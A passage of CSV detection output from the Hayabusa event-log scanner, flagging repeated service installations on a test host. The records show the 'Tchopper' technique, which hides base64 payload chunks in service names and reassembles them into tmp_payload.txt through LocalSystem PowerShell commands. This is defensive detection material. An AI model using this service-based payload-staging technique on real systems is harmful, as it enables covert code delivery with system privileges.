""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:27.853 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:27.853 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:29.297 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:29.297 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:29.297 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:30.766 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:30.766 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:30.766 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:32.227 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:32.227 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:32.227 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:33.680 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:33.680 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:33.680 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:35.189 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:35.189 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:35.189 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:36.641 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:36.641 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:36.641 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:38.089 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:38.089 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:38.089 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:39.555 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:39.555 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:39.555 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:41.021 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:41.021 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:41.021 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:42.474 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:42.474 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:42.474 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:43.938 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:43.938 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:43.938 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:45.441 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:45.441 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:16:45.441 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 